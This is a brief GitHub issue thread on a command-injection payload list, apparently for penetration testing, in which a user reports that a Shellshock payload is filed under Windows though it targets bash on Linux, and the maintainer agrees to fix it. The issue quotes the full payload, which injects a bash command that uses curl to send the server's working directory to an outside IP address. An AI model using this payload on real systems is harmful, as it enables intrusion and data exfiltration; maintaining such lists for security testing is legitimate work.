### ISSUE TITLE
Wrong Payload in Windows 

### ISSUE THREAD

**Issue by sandeepl337** [payloadbox/command-injection-payload-list#2]
Hi Ismailtasdelen, 

You have mentioned below payload in Windows.

() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"

This vulnerability exists in Linux, kindly make changes.

**Comment by ismailtasdelen** [comment]
I'il fix it right now, man.

Thanks @sandeepl337 !
